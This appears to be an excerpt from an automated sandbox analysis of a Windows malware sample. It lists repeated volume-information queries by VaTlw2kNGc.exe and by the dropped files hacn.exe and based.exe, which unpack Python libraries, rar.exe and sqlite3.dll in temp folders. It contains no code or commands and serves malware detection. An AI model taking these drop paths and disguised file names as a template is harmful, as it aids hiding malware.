Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI69202\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VaTlw2kNGc.exe	Queries volume information: C:\Users\user\Desktop\VaTlw2kNGc.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\_decimal.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26762\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\ProgramData\Microsoft\hacn.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\blank.aes VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libcrypto-1_1.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libffi-7.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\python310.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\rar.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\rarreg.key VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation	Jump to behavior
